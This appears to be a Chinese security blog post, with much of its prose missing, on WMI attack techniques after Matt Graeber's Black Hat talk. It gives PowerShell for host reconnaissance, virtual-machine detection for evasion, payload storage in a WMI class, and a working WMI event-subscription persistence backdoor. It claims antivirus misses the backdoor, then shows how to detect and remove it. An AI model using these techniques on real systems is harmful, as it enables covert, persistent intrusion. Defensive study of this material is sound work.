WMI Attacks

WMI Attacks

0x00 前言

Matt Graeber

Blackhat

powershell

WMI attacks

0x01 说明

WMI

wmiexec

0x02 测试环境

win8 x32

powershell v3

Winmgmt

WMI

0x03 WMI attacks

powershell

1、侦查

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume

Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

2、虚拟机检测

$VMDetected = $False
$Arguments = @{
Class = 'Win32_ComputerSystem'
Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
$VMDetected = $True
"In vm"
}
else{
"Not in vm"
}

$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE
"%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning)
{ $VMwareDetected = $True
"in vm"
}
else
{
"not in vm"
}

3、存储payload

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,
$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

可加密存储于此位置，执行时解密运行，达到硬盘不存文件的效果

4、隐蔽定时启动程序

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=

$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @

{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=

$WMIEventFilter;Consumer=$WMIEventConsumer}

之前在Stuxnet上面就使用了这个后门，通过mof实现
至今该后门方法...还有很多人在用
杀毒软件对此行为也不会查杀...

0x04 WMI后门检测及清除 ：

1、查看当前WMI Event

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

2、清除后门

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

0x05 总结

– vbs
– mof
– C/C++ via IWbem* COM API
– .NET System.Management classes

– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM

wmi attacks